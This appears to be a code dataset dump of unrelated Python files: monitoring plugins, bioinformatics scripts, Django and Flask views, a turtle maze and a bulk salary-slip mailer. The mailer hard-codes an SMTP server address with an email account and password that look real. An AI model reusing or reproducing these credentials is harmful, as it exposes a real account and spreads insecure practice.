text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python
import sys
import psutil
# change the command to match the full path of the executable
command = '/usr/lib/ddb/erts-7.2/bin/beam.smp'
def _bytes_to_mb(num):
return round(float(num) / 1024 / 1024, 2)
def _bytes_to_gb(num):
return round(float(num) / 1024 / 1024 / 1024, 2)
try:
perf_data = {}
for p in psutil.process_iter():
if command in p.cmdline():
mem_info_ex = p.memory_info_ex()
perf_data['rss'] = mem_info_ex.rss
perf_data['rss_mb'] = _bytes_to_mb(mem_info_ex.rss)
perf_data['rss_gb'] = _bytes_to_gb(mem_info_ex.rss)
perf_data['vms'] = mem_info_ex.vms
perf_data['vms_mb'] = _bytes_to_mb(mem_info_ex.vms)
perf_data['vms_gb'] = _bytes_to_gb(mem_info_ex.vms)
perf_data['shared'] = mem_info_ex.shared
perf_data['shared_mb'] = _bytes_to_mb(mem_info_ex.shared)
perf_data['shared_gb'] = _bytes_to_gb(mem_info_ex.shared)
perf_data['text'] = mem_info_ex.text
perf_data['lib'] = mem_info_ex.lib
perf_data['data'] = mem_info_ex.data
perf_data['dirty'] = mem_info_ex.data
output = "OK | "
for k, v in perf_data.iteritems():
output += "%s=%s;;;; " % (k.lower(), v)
print output
sys.exit(0)
except Exception, e:
print "Plugin Failed!: %s" % e
sys.exit(2) |
#!/usr/bin/env python
"""Split an interleaved PHYLIP-style alignment into two FASTA files:
one for the in-group sequences and one for the out-group sequence.

NOTE(review): the input/output files are never closed explicitly; data
is only flushed when the interpreter exits.
"""
import sys
InFileName = sys.argv[1] # alignment file
OutFileName = sys.argv[2] # in group FASTA file
OutFile2Name = sys.argv[3] # out group FASTA file
numSeqs = int(sys.argv[4]) # total number of sequences
outGroup = int(sys.argv[5]) # location of the outgroup sequence
InFile = open(InFileName, 'r')
OutFile = open(OutFileName, 'w')
OutFile2 = open(OutFile2Name, 'w')
rowCounter = 0
inData = []
seqNames = []
lineNum = 0
# One bucket per interleaved row (numSeqs sequences plus 2 extra rows,
# presumably the header line and a blank spacer — TODO confirm format).
for i in range(numSeqs + 2) :
    inData.append([])
for line in InFile :
    # Which interleaved row this physical line belongs to.
    row = rowCounter % (numSeqs + 2)
    if (lineNum <= numSeqs) :
        # First block: columns 0-8 hold the name, column 10+ the sequence.
        line = line.strip()
        name = line[0:9]
        seq = line[10:]
        seqNames.append(name)
        inData[row].append(seq)
        lineNum = lineNum + 1
    else :
        # Later blocks: the whole line is sequence data.
        line = line.strip()
        inData[row].append(line)
    rowCounter = rowCounter + 1
print(seqNames)
# Sequences live at indices 1..numSeqs (index 0 is the header row).
# NOTE(review): range(1, numSeqs) stops at numSeqs-1, which appears to
# drop the last sequence — confirm whether range(1, numSeqs + 1) was intended.
for i in range(1, numSeqs) :
    if (i == outGroup) :
        OutFile2.write(">" + seqNames[i] + "\n")
        for line in inData[i] :
            OutFile2.write(line + '\n')
    else :
        OutFile.write(">" + seqNames[i] + "\n")
        for line in inData[i] :
            OutFile.write(line + '\n')
        OutFile.write('\n')
|
#_*_coding:utf-8_*_
import logging
import json
import os
from datetime import datetime
from pprint import pprint

from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.db.models import F
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import (require_POST, require_GET)

from apps.kx.models import KxUserlogin
from models import ForumPost, ForumComment
from forms import ForumPostForm, ForumCommentForm
logger = logging.getLogger(__name__)
def index(request):
    """Render the forum front page: every post with its comment count
    and net vote score, newest first."""
    posts = ForumPost.objects.all().order_by('-created')
    data = [
        (post,
         ForumComment.objects.filter(fid__exact=post).count(),
         post.vote_up - post.vote_down)
        for post in posts
    ]
    return render(request, "forum/index.html", {"posts": data})
@require_POST
@login_required(redirect_field_name='forum_index')
def add(request):
    """Create a new forum post from POST data, stamping the author and
    client IP, then redirect to the index (also on invalid input).

    Fix: removed a leftover debug `print request.path` statement.
    """
    form = ForumPostForm(request.POST)
    if form.is_valid():
        f = form.save(commit=False)
        f.user_id = request.user.pk
        f.ip = request.META.get('REMOTE_ADDR', '')
        f.save()
    return HttpResponseRedirect(reverse('forum_index'))
@require_POST
@login_required(redirect_field_name="forum_add")
def reply(request):
    """Attach a comment to a post and redirect to that post's page.

    Bug fix: when the form was invalid, the old code fell through to a
    NameError on `fid` (a 500). Invalid input now redirects to the index.
    """
    form = ForumCommentForm(request.POST)
    if form.is_valid():
        fid = form.cleaned_data['fid']
        f = form.save(commit=False)
        f.user_id = request.user.pk
        f.ip = request.META.get('REMOTE_ADDR', '')
        f.save()
        return HttpResponseRedirect('post/' + str(fid) + '/')
    return HttpResponseRedirect(reverse('forum_index'))
@require_GET
def post(request, pid):
    """Show one forum post with its net vote score and all comments."""
    entry = ForumPost.objects.select_related().get(pk=pid)
    context = {
        "post": entry,
        "vote": entry.vote_up - entry.vote_down,
        "comments": entry.forumcomment_set.all(),
    }
    return render(request, "forum/detail.html", context)
@login_required()
@require_POST
def vote(request):
    """Record an up-vote (v='0') or down-vote (v='1') on a post and
    return a JSON status payload.

    Bug fix: the counters were read, incremented in Python and written
    back, losing concurrent votes; F() expressions make the increment
    atomic in the database. (Requires `from django.db.models import F`.)
    """
    message = {}
    pid = request.POST.get("id", "")
    v = request.POST.get("v", "")
    try:
        # Raises ForumPost.DoesNotExist for an unknown pid, which the
        # except branch reports as a failure, same as before.
        ForumPost.objects.get(pk=pid)
        if v == '0':
            ForumPost.objects.filter(pk=pid).update(vote_up=F('vote_up') + 1)
        elif v == '1':
            ForumPost.objects.filter(pk=pid).update(vote_down=F('vote_down') + 1)
        message['status'] = 1
        message['info'] = "投票成功!"
        message['data'] = 0
    except Exception as e:
        logger.debug("vote:%s", e)
        message['status'] = 0
        message['info'] = "投票失败!"
        message['data'] = 0
    return HttpResponse(json.dumps(message), content_type="application/json")
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class GrupoConfig(AppConfig):
    """Django application configuration for the 'Grupo' app."""
    name = 'Grupo'
|
# Compute base**exponent exactly, where the base may carry a decimal
# point, by doing integer arithmetic and re-inserting the point.
# Input format: "<base> <exponent>", e.g. "1.5 2" or "3 4".
s=input()
if(len(s.split('.'))==2):
    # Base has a fractional part: "a.x y" -> integer part a, fraction x.
    a,b=s.split('.')
    x,y=b.split(' ')
    c=len(x)  # number of fractional digits in the base
    if(a!='0'):
        # (a.x)**y == (a concatenated with x)**y with c*y fractional digits.
        d=int(a+x)**int(y)
        print(str(d)[:-c*int(y)]+'.'+str(d)[-c*int(y):])
    else:
        # Base < 1: result is "0." followed by x**y left-padded to c*y digits.
        d=str(int(x)**int(y))
        while len(d)<c*int(y): d='0'+d
        print("0."+d)
else:
    # Plain integer base and exponent.
    p,q=map(int,s.split(' '))
    print(p**q)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import io, sys
from argparse import ArgumentParser
#this script takes a text file with tab delimited columns
#and adds every column except the first line-wise to the target file.
#Both files should ideally have the same number of lines.
#The script will terminate once either file ends.
# For example:
# Appended file:
# Computer Nom.Sg.Masc
#
# Target file:
# Computer NN Computer
#
# becomes
#
# Computer NN Computer Nom.Sg.Masc
#
# usage:
# append_column.py [OPTIONS] <APPEND_COLS_FILE> <TARGET_FILE>
#
# Options and arguments:
#
# -h Print this message and quit
#
#
# example:
# append_column.py morph.tab tagged.tab > merged.tab
# etc.
# True when running under Python 3 (controls the unicode shim below).
PY3 = sys.version_info[0] == 3


def inject_col(source_lines, target_lines, col=-1, into_col=None, skip_supertoks=False):
    """Copy one column from `source_lines` into each tab-delimited row
    of `target_lines`, passing markup/blank lines through untouched.

    :param source_lines: donor rows (list, or newline-joined string)
    :param target_lines: receiving rows (list, or newline-joined string)
    :param col: index of the donor column to copy (default: last column)
    :param into_col: target column index to overwrite; None appends
    :param skip_supertoks: pass rows whose first cell contains "-" through
    :return: the merged rows joined with newlines

    NOTE(review): `col` is compared against the int -1 below, so callers
    must pass an int; a numeric string like "-1" triggers the filtering
    branch and then fails as a list index.
    """
    output = []
    counter = -1
    target_line = ""
    if not PY3:
        # Python 2 only: normalise unicode input to a utf-8 byte string.
        if isinstance(target_lines,unicode):
            target_lines = str(target_lines.encode("utf8"))
    if not isinstance(source_lines,list):
        source_lines = source_lines.split("\n")
    if not isinstance(target_lines,list):
        target_lines = target_lines.split("\n")
    if col != -1:
        # non-final column requested, ensure source_lines only has lines with tabs
        source_lines = [l for l in source_lines if "\t" in l]
    for i, source_line in enumerate(source_lines):
        # Advance the target cursor to the next row that should receive a
        # column; markup lines (<...>), blanks, and (optionally) supertoken
        # rows are emitted unchanged along the way.
        while len(target_line) == 0:
            counter +=1
            target_line = target_lines[counter]
            if (target_line.startswith("<") and target_line.endswith(">")) or len(target_line) == 0:
                output.append(target_line)
                target_line = ""
            else:
                target_cols = target_line.split("\t")
                if "-" in target_cols[0] and skip_supertoks:
                    output.append(target_line)
                    target_line = ""
        source_cols = source_line.split("\t")
        to_inject = source_cols[col]
        target_cols = target_line.split("\t")
        if into_col is None:
            target_cols.append(to_inject)
        else:
            target_cols[into_col] = to_inject
        output.append("\t".join(target_cols))
        # Clear the cursor so the next donor row fetches a fresh target row.
        target_line=""
    return "\n".join(output)
if __name__ == "__main__":
    p = ArgumentParser()
    p.add_argument("source")
    p.add_argument("target")
    # Fix: parse the column as an int — the old string default "-1"
    # never compared equal to -1 inside inject_col and then crashed
    # when used as a list index.
    p.add_argument("-c", "--col", action="store", type=int, default=-1)
    opts = p.parse_args()
    # Fix: the old code read `opts.file1` (an attribute that does not
    # exist) and read the *source* file for both inputs.
    source_lines = io.open(opts.source, encoding="utf8").read().replace("\r", "").split("\n")
    target_lines = io.open(opts.target, encoding="utf8").read().replace("\r", "").split("\n")
    merged = inject_col(source_lines, target_lines, opts.col)
    print(merged)
|
from distutils.core import setup, Extension
from Cython.Build import cythonize
import numpy

# Cython extension that wraps the SLGR engine static library.
gmm_extension = Extension(
    "GMMModel",
    sources=["GMMModel.pyx"],
    extra_objects=['../slgr_engine/slgr_lib.a'],
    language="c++",
    include_dirs=['../slgr_engine/', numpy.get_include()],
    extra_compile_args=["-std=c++0x", "-fpermissive"],
    extra_link_args=['-lfftw3', '-lstdc++'],
)

setup(name="GMMModel", ext_modules=cythonize(gmm_extension))
|
from django.contrib import admin
from . import models

# Register this app's models with the default admin site.
for model in (models.RelatedResource1, models.RelatedResource2, models.TestResource):
    admin.site.register(model)
|
# -*- coding: utf-8 -*-
import os
import datetime
import sys
import pandas as pd
from time import localtime, strftime
from collections import OrderedDict
from konlpy.tag import Twitter
from apyori import apriori
DATADIR = 'C:/Users/planit/Desktop/bigdata/'
NEWFILE = ''
def read_newfile():
    """Return the name of the Excel file to process.

    NOTE(review): the loop below orders `files` by modification time and
    prints the newest entry, but the result is unused — the function
    always returns the hard-coded 'article.xlsx'. Confirm intent.
    """
    dir = DATADIR
    files = os.listdir(dir)
    # listdir() returns the directory entries as a list.
    # Order the files by modification timestamp (newest first) via
    # repeated pairwise swaps.
    for i in range(0, len(files)):
        for j in range(0, len(files)):
            if datetime.datetime.fromtimestamp(os.path.getmtime(dir + files[i])) > \
               datetime.datetime.fromtimestamp(os.path.getmtime(dir + files[j])):
                (files[i], files[j]) = (files[j], files[i])
    print(files[0])
    NEWFILE = 'article.xlsx'
    return NEWFILE
def pretreatment_content(filname):
    """Read the article spreadsheet and return {year: [nouns]} extracted
    from the deduplicated titles (contents are processed the same way in
    the commented-out variant below).
    """
    PATH = DATADIR + filname
    result = {}
    ori_data = pd.read_excel(PATH, sheet_name='Sheet1')
    # Keep only the columns we need, dropping duplicate articles.
    temp_data = ori_data[['years', 'title', 'contents']]
    temp_data = temp_data.drop_duplicates(subset=['title', 'contents'], keep='last')
    # Group titles/contents per year, ordered by frequency.
    titles_dict = temp_data.groupby('years')['title'].apply(lambda grp : list(grp.value_counts().index)).to_dict()
    contents_dict = temp_data.groupby('years')['contents'].apply(lambda grp: list(grp.value_counts().index)).to_dict()
    #contents_dict = temp_data.groupby('years')["contents"].apply(lambda x: x.tolist())
    twitter = Twitter()
    for date in titles_dict.keys():
        # Extract nouns from the (stringified) list of titles per year.
        titles_dict[date] = twitter.nouns(str(titles_dict[date]))
    return titles_dict
    #print(titles_dict.values())
    # for date in contents_dict.keys():
    #     contents_dict[date] = twitter.nouns(str(contents_dict[date]))
    #     return contents_dict
    # print(contents_dict.values())
    # for name_of_the_group, group in titles:
    #     print(name_of_the_group)
    #     print(group)
    # for index, row in temp_data.iterrows():
    #     compare_result[ori_data['years'][index]] = twitter.nouns(ori_data['title'][index])
    #     compare_result[ori_data['years'][index]] = twitter.nouns(ori_data['contents'][index])
    # print(compare_result)
def main():
    """Join per-date article nouns with daily stock-movement labels and
    mine association rules (apriori) over the combined transactions."""
    excel = read_newfile()
    stdata = pretreatment_content(excel) # tokenized word data per date
    stdataval = list(stdata.values())
    store_data = pd.read_csv('C:\\Users\\planit\\Desktop\\bigdata\\stock2.csv') # stock data
    temp = [] # [date, movement-label] pairs only
    # Label each trading row: '1' up, '0' flat, '-1' down.
    # NOTE(review): the row count 76 is hard-coded — confirm it matches stock2.csv.
    for i in range(76):
        if store_data.values[i][3] > 0 :
            temp.append([store_data.values[i][1],'1'])
        elif int(store_data.values[i][3]) == 0 :
            temp.append([store_data.values[i][1],'0'])
        elif int(store_data.values[i][3]) < 0 :
            temp.append([store_data.values[i][1],'-1']) # e.g. [['2019-02-12-', '1'], ['2019-02-13-', '-1'], ...]
    temp2 = {} # per-date word lists with the label appended (apriori input)
    # Keep only the dates present in both datasets.
    # NOTE(review): stdataval[i] pairs the i-th dict value with the i-th
    # stock row purely by position — relies on matching order; confirm.
    for i in range(len(temp)):
        if temp[i][0] in stdata:
            stdataval[i].append(temp[i][1])
            temp2[temp[i][0]] = stdataval[i] # {date: [words..., label]}
    print(temp2) # e.g. {'2019-02-12-': ['절반', '이상', ..., '1'], ...}
    apriorival = list(temp2.values())
    association_rules = apriori(apriorival, min_support=0.1, min_confidence=0.4)
    association_results = list(association_rules)
    print(len(association_results))
    for ar in association_results:
        print(ar)
main() |
from typing import List, Tuple, Optional
from flask import Blueprint, render_template
from models import Venue, Contest
VENUE_MOD = Blueprint('venue_mod', __name__)
@VENUE_MOD.route('/')
def all_venues() -> str:
    """Render the venue list page, annotating each venue with the number
    of contests held there."""
    breadcrumb = [
        {'path': '/', 'name': '首頁'},
        {'name': '場地'}
    ]
    venues = Venue.query.all()
    for entry in venues:
        entry.contest_count = Contest.query.filter_by(venue_id=entry.id).count()
    shortcut_options: List[str] = []  # ['北區', '中區', '南區', '海外']
    return render_template(
        'venues.html',
        search_fields=['venue-name', 'venue-location'],
        shortcut_options=shortcut_options,
        search_hint='場地名稱 / 城市',
        ascending=True,
        breadcrumb=breadcrumb,
        venues=venues)
@VENUE_MOD.route('/<venue_id>')
def get_venue_detail(venue_id: str) -> Tuple[str, Optional[int]]:
    """Render one venue's detail page with its contest history.

    Returns an error page with status 400 for a malformed id, and — bug
    fix — 404 when the id is well-formed but unknown (the old code fell
    through to an AttributeError on `venue.name`).
    """
    if not venue_id.isdigit():
        return render_template(
            'error.html',
            title='Invalid venue ID',
            reason=f'[{venue_id}] is not a valid format.'), 400
    venue = Venue.query.filter_by(id=venue_id).first()
    if venue is None:
        return render_template(
            'error.html',
            title='Venue not found',
            reason=f'No venue with id [{venue_id}].'), 404
    contest_record = Contest.query.filter_by(venue_id=venue_id).all()
    breadcrumb = [
        {'path': '/', 'name': '首頁'},
        {'path': '/venue/', 'name': '場地'},
        {'name': venue.name}
    ]
    return render_template(
        'venue.html',
        ascending=False,
        breadcrumb=breadcrumb,
        venue=venue,
        contests=contest_record)
|
import turtle as trtl
# ----- maze and turtle config variables
screen_h = 400
screen_w = 420
startx = -100
starty = -100
turtle_scale = 1.5
# ------ robot commands
def move(times: int = 1):
    """Advance the robot `times` squares, marking each start with a dot."""
    for _ in range(times):
        robot.dot(10)
        robot.fd(50)
def turn_left(times: int = 1):
    """Rotate the robot 90 degrees left, `times` times."""
    for _ in range(times):
        robot.speed(0)   # rotate instantly
        robot.lt(90)
        robot.speed(2)   # restore walking speed
def turn_right(times: int = 1):
    """Rotate the robot 90 degrees right, `times` times, implemented as
    three left turns per right turn.

    Bug fix: the original initialised the inner loop counter once outside
    the outer loop, so any call with times > 1 performed the three left
    turns only on the first iteration.
    """
    for _ in range(times):
        for _ in range(3):
            turn_left()
# ----- init screen
wn = trtl.Screen()
wn.setup(width=screen_w, height=screen_h)
robot_image = "robot.gif"
wn.addshape(robot_image)
# ----- init robot
robot = trtl.Turtle(shape=robot_image)
robot.hideturtle()
robot.color("darkorchid")
robot.pencolor("darkorchid")
robot.penup()            # draw only the dots, not the path line
robot.setheading(90)     # face "up" so the maze moves read naturally
robot.turtlesize(turtle_scale, turtle_scale)
robot.goto(startx, starty)
robot.speed(2)
robot.showturtle()
wn.bgpic("maze3.png") # other file names should be maze2.png, maze3.png
# ----- scripted path through the maze
move()
turn_right()
move(2)
turn_left()
move(2)
turn_right()
move(2)
turn_left()
move()
wn.mainloop()
|
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
from rest_framework.views import APIView
from rest_framework.response import Response
from libs.captcha.captcha import captcha
from django_redis import get_redis_connection
from libs.yuntongxun.sms import CCP
from users.utils import check_access_token_to_mobile
from verifications.serializers import RegisterSmsSerializer
import random
from celery_tasks.sms.tasks import send_sms_code
# Image captcha
class RegisterImageCodeAPI(APIView):
    """Generate an image captcha, cache its text in redis under the
    client-supplied uuid, and return the image bytes."""
    def get(self,request,image_code_id):
        # 1. receive the uuid (from the URL)
        # 2. generate the captcha text + image
        text,image = captcha.generate_captcha()
        print(text)
        # 3. store the captcha text in redis with a 300 s TTL
        redis_conn = get_redis_connection('code')
        redis_conn.setex('img'+image_code_id,300,text)
        # 4. return the captcha image
        return HttpResponse(image,content_type='image/jpeg')
# SMS verification code
class RegisterSmsCodeAPI(APIView):
    """Validate the request, send a 6-digit SMS verification code to the
    mobile number, and cache the code in redis for later verification."""
    def get(self, request, mobile=None):
        # 1. receive the query data
        query_params = request.query_params
        # 2. validate it. Bug fix: is_valid() was never called, so the
        #    serializer's checks were silently skipped.
        serializer = RegisterSmsSerializer(data=query_params)
        serializer.is_valid(raise_exception=True)
        # 3. generate the 6-digit code
        sms_code = '%06d' % random.randint(0, 999999)
        print(sms_code)
        # When no mobile is in the URL, recover it from the access token.
        if mobile is None:
            access_token = request.query_params['access_token']
            mobile = check_access_token_to_mobile(access_token)
        # 4. send the SMS (code is advertised as valid for 5 minutes)
        CCP().send_template_sms(mobile, [sms_code, 5], 1)
        # send_sms_code.delay(mobile,sms_code)
        # 5. cache the code in redis for the verification step
        redis_conn = get_redis_connection('code')
        redis_conn.setex('sms_'+mobile, 5*60, sms_code)
        return Response({'msg':'ok'})
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 2 08:42:48 2021

@author: Jose Luis Robledo

List comprehensions

A construct consisting of an expression that determines how to transform
the elements of a list, followed by one or more `for` clauses and,
optionally, one or more `if` clauses. The result is a new list.
"""
lista = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# Cube every element of the list
cubos = [valor ** 3 for valor in lista]
print('Cubos de 1 a 10:', cubos)

x = (1, 3, 4)
y = 1
z = 3
# Return x[2] when the first two components match y and z, else 0.
variable = lambda x, y, z: x[2] if x[0] == y and x[1] == z else 0
print(variable(x, y, z))

numeros = [135, 154, 180, 193, 210]
divisiblespor3 = [valor for valor in numeros if valor % 3.0 == 0]
div3Lambda = list(filter(lambda x: x % 3 == 0, numeros))
print(divisiblespor3)
print(div3Lambda)
# Show the list of numbers divisible by 3
print(divisiblespor3)

# Function that returns the inverse of a number
def funcion(x):
    return 1/x

inv = lambda x: 1/x
lista2 = [1, 2, 3]  # sample list
# Show the inverses of each number
print([funcion(index) for index in lista2])
print([inv(elemento) for elemento in lista2])
# Bug fix: the original printed the lambda object itself; the lambda now
# takes the list as its (previously ignored) parameter and is called.
resultado = lambda xs: [1/x for x in xs]
print(resultado(lista2))

lis = [1, 2, 3]
lis2 = [4, 5, 6]
lista = [(1, 2), (1, 2), (1, 2), (1, 2)]
comprension = lambda lista: [[x] for x in lista]
# Bug fix: call the lambda instead of printing the function object.
print(comprension(lista))
"""
#------------------------------------------------------------------------------
# Create ZV-IC Shaper
#
# This script will take a generalized input from an undamped second order system subject
# to nonzero initial conditions and solve the minimum-time ZV shaper using optimization
#
# Created: 6/20/17 - Daniel Newman -- dmn3669@louisiana.edu
#
# Modified:
# * 6/20/17 - DMN -- dmn3669@louisiana.edu
# - Added documentation for this script
#------------------------------------------------------------------------------
"""
# Ignore user warnings to keep the terminal clean
import warnings
warnings.simplefilter("ignore", UserWarning)
# Import the necessary python library modules
import numpy as np
from scipy.signal import lsim
from scipy.special import gamma
import os
import sys
import pdb
# Add my local path to the relevant modules list
sys.path.append('/Users/Daniel/Github/Crawlab-Student-Code/Daniel Newman/Python Modules')
# Import my python modules
import InputShaping as shaping
import Generate_Plots as genplt
import twomass
import onemass
folder = 'Figures/{}/'.format(
sys.argv[0],
)
# x: array([ 0.2648, 0.7723, 0.2277, 0.0144, 0.0076])
dt = 0.01
t = np.arange(0,10,dt)
k = (2 * np.pi)**2
c = 0.0
k_p = 40
k_d = 15
a_1 = 0.5044
t_shaper = 1.5
m_1 = 1
m_2 = 1
x1_init = 0.
x1_dot_init = 0.
x2_init = 0.
x2_dot_init = 0.
StartTime = 0.0
X0 = [x1_init,x1_dot_init,x2_init,x2_dot_init]
X0_onemass = [x1_init,x1_dot_init]
Distance = 0.
Amax = 50.
Vmax = 2.
omega_n = np.sqrt(c *(m_1 + m_2) / (2 * m_1 * m_2) \
- np.sqrt(m_1 + m_2) / (2 * m_1 * m_2) * np.sqrt(c**2 * m_1 + c**2 * m_2 + 4 * k * m_1 * m_2* 1j * 1j)).real
zeta_n = c / (m_2 * 2 * omega_n)
omega_n = omega_n * np.sqrt(1 - (zeta_n)**2)
# The InputShaping module does a Hertz to Radians conversion.
omega_n_hz = omega_n / (2 * np.pi) # Hz
tau = 2*np.pi / omega_n
a_1 = 0.5
a_2 = 1 - a_1
t_shaper = shaping.ZV(1.67 / (2 * np.pi),c / (m_2 * omega_n)).duration
shaper = np.array([[0,0.6371],[0.7479,1 - 0.6371]])
def actuator_effort(response,shaper):
shaped_pos = shaping.shaped_input(shaping.step_input,t,shaper,Distance)
actuator_effort = (k_d * -response[:,1] + k_p * (shaped_pos - response[:,0])) / m_1
return actuator_effort
p = [[Amax,Vmax], m_1, m_2, c, k, StartTime, k_d, k_p, dt, t, X0, Distance]
disturbance = shaping.pulse(t,20,0.5,1)
m2_response,sys_input = twomass.response(p,'Unshaped',m2_disturbance=disturbance)
m1_response,sys_input = twomass.response(p,'Unshaped',m1_disturbance=disturbance)
genplt.compare_responses(t,
m2_response[:,2],'Unshaped',
m1_response[:,2],'Unshaped',
#disturbance,'Disturbance',
name_append='Response',
xlabel='Time (s)',ylabel='Position (m)',
folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1
)
|
import os
import re
import cv2
import pickle
import argparse
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from helper import save_obj
from pose_block import initial_pose_estimation
from create_renderings import create_refinement_inputs
from pose_refinement import train_pose_refinement
from correspondence_block import train_correspondence_block
from create_ground_truth import create_GT_masks, create_UV_XYZ_dictionary, dataset_dir_structure
parser = argparse.ArgumentParser(
    description='Script to create the Ground Truth masks')
parser.add_argument("--root_dir", default="BinMOD_Dataset/",
                    help="path to dataset directory")
parser.add_argument("--bgd_dir", default="val2017/",
                    help="path to background images dataset directory")
parser.add_argument("--split", default=0.85, help="train:test split ratio")
args = parser.parse_args()
root_dir = args.root_dir
background_dir = args.bgd_dir
# Collect every .jpg found under the dataset root.
list_all_images = []
for root, dirs, files in os.walk(root_dir):
    for file in files:
        if file.endswith(".jpg"): # images that exist
            list_all_images.append(os.path.join(root, file))
num_images = len(list_all_images)
indices = list(range(num_images))
np.random.seed(69)  # fixed seed -> reproducible train/test split
np.random.shuffle(indices)
split = int(np.floor(args.split * num_images))
train_idx, test_idx = indices[:split], indices[split:]
print("Total number of images: ", num_images)
print(" Total number of training images: ", len(train_idx))
print(" Total number of testing images: ", len(test_idx))
# Persist the image list and split indices for later pipeline stages.
save_obj(list_all_images, root_dir + "all_images_adr")
save_obj(train_idx, root_dir + "train_images_indices")
save_obj(test_idx, root_dir + "test_images_indices")
dataset_dir_structure(root_dir)
# Intrinsic Parameters of the Camera
fx = 2300/3.2
px = 1032/3.2
fy = 2300/3.2
py = 772/3.2
intrinsic_matrix = np.array([[fx, 0, px], [0, fy, py], [0, 0, 1]])
# NOTE(review): this 13-class map is immediately overwritten with the
# single-class {'bin': 1} map below — confirm which is intended.
classes = {'ape': 1, 'benchviseblue': 2, 'cam': 3, 'can': 4, 'cat': 5, 'driller': 6,
           'duck': 7, 'eggbox': 8, 'glue': 9, 'holepuncher': 10, 'iron': 11, 'lamp': 12, 'phone': 13}
classes = {'bin': 1}
# Pipeline stages; most are currently disabled (commented out) and only
# the initial pose estimation step runs.
print("------ Start creating ground truth ------")
#create_GT_masks(root_dir, background_dir, intrinsic_matrix, classes)
#create_UV_XYZ_dictionary(root_dir) # create UV - XYZ dictionaries
print("----- Finished creating ground truth -----")
print("------ Started training of the correspondence block ------")
#train_correspondence_block(root_dir, classes, epochs=40)
print("------ Training Finished ------")
print("------ Started Initial pose estimation ------")
initial_pose_estimation(root_dir, classes, intrinsic_matrix)
print("------ Finished Initial pose estimation -----")
print("----- Started creating inputs for DL based pose refinement ------")
#create_refinement_inputs(root_dir, classes, intrinsic_matrix)
print("----- Finished creating inputs for DL based pose refinement")
print("----- Started training DL based pose refiner ------")
#train_pose_refinement(root_dir, classes, epochs=10)
print("----- Finished training DL based pose refiner ------")
|
from . import *
from sqlalchemy.orm import column_property
class Artist(Base):
    """SQLAlchemy ORM model for an artist, with an optional name prefix
    (e.g. "The") combined into `fullname` on both the Python and SQL side.
    `hybrid_property` and `func` are presumably brought in by the
    package's `from . import *` — TODO confirm.
    """
    __tablename__ = 'artist'
    id = Column(Integer, primary_key=True)
    name = Column(String(255))
    prefix = Column(String(32))
    # NOTE(review): Index(name) passes the Column as the index *name*
    # argument; SQLAlchemy's signature is Index("ix_name", column).
    # Confirm these create the intended indexes.
    Index(name)
    Index(prefix)
    __table_args__ = {'mysql_engine':'MyISAM'}
    def __str__(self):
        # HTML link to the artist detail page.
        return u'<a href="/artist/?id={}">{}</a>'.format(self.id, self.fullname)
    @property
    def new_link(self):
        # HTML link to the "new artist" page.
        return u'<a href="/artist/new/{}">{}</a>'.format(self.id, self.fullname)
    def get_url(self):
        """Return the canonical URL path for this artist."""
        return "/artist/{}".format(self.id)
    @hybrid_property
    def fullname(self):
        # Python side: "<prefix> <name>" when a prefix exists.
        if self.prefix is None:
            return self.name
        else:
            return self.prefix + " " + self.name
    @fullname.expression
    def fullname(self):
        # SQL side: concat_ws skips a NULL prefix automatically.
        return func.concat_ws(" ", self.prefix, self.name)

# Precomputed column: the fullname wrapped in a detail-page link.
Artist.fullname_url = column_property(func.concat('<a href="/artist/?id=', Artist.id, '">', Artist.fullname, '</a>'))
|
from tkinter import *
import smtplib
import email.mime.multipart
from email.mime.text import MIMEText
import xlrd
import win32ui
def sendmail():
    """Read rows from the selected Excel workbook and e-mail each row as
    an HTML table to the address in the row's last column.

    Relies on module-level `path`, `t4`, `t5` set by the tkinter UI.
    NOTE(review): indentation was reconstructed; `smtp.quit()` is placed
    after the loop so the connection serves every row — confirm.
    """
    # read header / subject from the UI fields
    head=t4.get()
    subject=t5.get()
    # SECURITY(review): credentials are hard-coded; the t1/t2 entry
    # fields collected in the UI are never used — confirm intent.
    fmail='changnl@chinaunicom.cn'
    psd='CNLcw198608'
    smtp=smtplib  # NOTE(review): dead assignment, overwritten below
    smtp=smtplib.SMTP()
    smtp.connect('10.11.158.13','25')
    smtp.starttls()
    #smtp.login('lixf311@chinaunicom.cn','2676518aA')
    smtp.login(fmail,psd)
    #print (head)
    #print (subject)
    # read sheet 1 of the workbook
    #path=input('输入邮件明细地址')
    #book=xlrd.open_workbook(r"d:\201601.xlsx")
    book=xlrd.open_workbook(path)
    sh = book.sheet_by_index(0)
    cx=sh.ncols-1  # last column holds the recipient address
    # compose the mail
    #msg=email.mime.multipart.MIMEMultipart()
    #head=input('输入邮件头部内容')
    #subject=input('输入邮件的主题')
    L= range(sh.nrows)
    for rx in L[1:]:  # skip the header row
        mail=sh.cell_value(rx,cx)
        # build an HTML table: header text, column names, then the row
        html='<html><table border="1" ><P>'+head+'</p><tr>'
        for cl in range(sh.ncols-1):
            html=html+'<td>'+str(sh.cell_value(0,cl))+'</td>'
        html=html+'</tr><tr>'
        for dl in range(sh.ncols-1):
            if type(sh.cell_value(rx,dl))==float :
                # round floats to 2 decimals for display
                html=html+'<td>'+str(round(sh.cell_value(rx,dl),2))+'</td>'
            else :
                html=html+'<td>'+str(sh.cell_value(rx,dl))+'</td>'
        html=html+'</tr></table></html>'
        msg = MIMEText(html,'html','utf-8')
        msg['from']=fmail
        msg['to']=mail
        #msg['subject']='测试工资条'
        msg['subject']=subject
        smtp.sendmail(fmail,mail,msg.as_string())
        print (mail,'邮件发送成功')
        #print (html)
    smtp.quit()
def openfile():
    """Show a Windows file-open dialog and return the chosen path."""
    dlg = win32ui.CreateFileDialog(1) # 1 = "open file" dialog
    dlg.SetOFNInitialDir('C:/') # initial directory shown in the dialog
    dlg.DoModal()
    filename = dlg.GetPathName() # full path of the selected file
    return filename
